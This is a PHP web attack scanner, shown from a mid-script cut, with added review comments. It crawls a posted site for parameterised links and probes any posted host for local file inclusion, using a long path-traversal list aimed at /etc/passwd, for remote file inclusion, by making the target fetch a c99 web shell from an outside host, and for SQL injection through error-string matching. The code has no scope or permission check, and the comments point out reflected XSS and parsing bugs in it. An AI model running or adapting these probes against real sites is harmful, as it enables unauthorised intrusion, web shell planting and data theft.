Site to test: '; $link = $_POST['scan']; preg_match('@^(?:http://)?([^/]+)@i',$link, $matches); $host = $matches[1]; function getLinks($link) { $ret = array(); $dom = new domDocument; @$dom->loadHTML(file_get_contents($link)); $dom->preserveWhiteSpace = false; $links = $dom->getElementsByTagName('a'); foreach ($links as $tag) { $ret[$tag->getAttribute('href')] = $tag->childNodes->item(0)->nodeValue; } return $ret; } if (isset($_POST["searchn"])) { echo '
'; echo "
Links found:
    "; if (preg_match("/=/", $link)) { echo ''.$link.'
    '; } $urls = getLinks($link); if(sizeof($urls) > 0) { foreach($urls as $key=>$value) { if (preg_match("/=/i", $key)) { if (preg_match("/.com|.net|.org|.co.uk|.com.au|.us/", $key)) { echo ''.$key.'
    '; } else{ echo ''.$host.'/'.$key.'
    '; } } } echo "
"; } else { echo ""; echo "No exploitable links found at $link

"; } echo "
"; } }
// selected(): handler for the "Testing.." form. Walks the URL list posted in
// $_POST['sites'] (untrusted, never validated), cuts each entry after its last
// "=" so the probe functions can append their own value, and calls
// rfi()/lfi()/sql() on the result.
// NOTE(review): $siteedit is echoed into the page unescaped, so a crafted
// 'sites' entry is reflected straight into this page's own HTML; every probe
// below also issues an outbound request to whatever host was posted.
// NOTE(review): strrpos() returns false when there is no "=", and false+1 is 1,
// so such an entry is reduced to its first character before being probed.
function selected(){
    echo '
';
    $sites = $_POST['sites'];
    $n = count($sites);
    $i = 0;
    $r = 1;   // 1-based display counter
    echo "Testing.." . "
    ";
    while ($i < $n) {
        $site = "{$sites[$i]}";
        $equals = strrpos($site,"=");
        // keep everything up to and including the last "="
        $siteedit = substr_replace($site, '', $equals+1);
        echo "
    $r. $siteedit
    ";
        rfi($siteedit);
        lfi($siteedit);
        sql($siteedit);
        $i++;
        $r++;
    }
    echo "
";
    echo "Test again";
}

// lfi(): appends each entry of a fixed path-traversal list (with and without a
// trailing %00) to $site, fetches the page and reports a hit whenever the
// response body contains "root" (case-insensitive). Fetch errors are silenced
// with @, so an unreachable host is indistinguishable from "No LFI found.".
// Defender's view: these requests stand out in access logs (runs of "../" and
// "/etc/passwd" inside a query string); the underlying flaw is eliminated by
// never building include/file paths from request parameters.
function lfi($site) {
    $lfifound = 0;
    $lfi = array(
        "/etc/passwd",
        "../etc/passwd",
        "../../etc/passwd",
        "../../../etc/passwd",
        "../../../../etc/passwd",
        "../../../../../etc/passwd",
        "../../../../../../etc/passwd",
        "../../../../../../../etc/passwd",
        "../../../../../../../../etc/passwd",
        "../../../../../../../../../etc/passwd",
        "../../../../../../../../../../etc/passwd",
        "/etc/passwd%00",
        "../etc/passwd%00",
        "../../etc/passwd%00",
        "../../../etc/passwd%00",
        "../../../../etc/passwd%00",
        "../../../../../etc/passwd%00",
        "../../../../../../etc/passwd%00",
        "../../../../../../../etc/passwd%00",
        "../../../../../../../../etc/passwd%00",
        "../../../../../../../../../etc/passwd%00",
        "../../../../../../../../../../etc/passwd%00"
    );
    $totallfi = count($lfi);
    for ($i=0; $i<$totallfi; $i++) {
        // one HTTP request per list entry; @ hides connection/HTTP warnings
        $GET = @file_get_contents("$site$lfi[$i]");
        if (preg_match("/root/i",$GET, $matches)) {
            echo "LFI found: $site$lfi[$i]
";
            $lfifound = 1;
        }
    }
    if ($lfifound == 0) {
        echo "No LFI found.
";
    }
}

// rfi(): appends one hard-coded remote URL to $site, fetches the page and
// reports a hit when the body contains "root". Same silenced-error and loose
// "root" heuristic as lfi().
// Defender's view: a full "http://" URL arriving inside a query parameter is
// the classic remote-include signature; allow_url_include=Off plus allowlisted
// include paths remove this vulnerability class.
function rfi($site) {
    $rfifound = 0;
    $rfi = "http://www.evilc0der.com/c99.txt?";
    $GET1 = @file_get_contents("$site$rfi");
    if (preg_match("/root/i",$GET1, $matches)) {
        echo "RFI found: $site$rfi
";
        $rfifound = 1;
    }
    if ($rfifound == 0) {
        echo "No RFI found.
";
    }
}

// sql(): appends "99'" (a value followed by a stray single quote) to $site and
// greps the response for common MySQL/PHP error fragments, printing
// "SQL found" on a match. Fetch errors are silenced with @ as above.
// Defender's view: the only signal this relies on is a verbose database error
// leaking into the response — parameterised queries remove the flaw and
// display_errors=Off removes the signal.
function sql($site) {
    $sqlfound = 0;
    $sql = "99'";
    $GET2 = @file_get_contents("$site$sql");
    if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch?_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET2, $matches)) {
        echo "SQL found: $site$sql
";
        $sqlfound = 1;
    }
    if ($sqlfound == 0) {
        echo "No SQL found.
";
    }
}
?>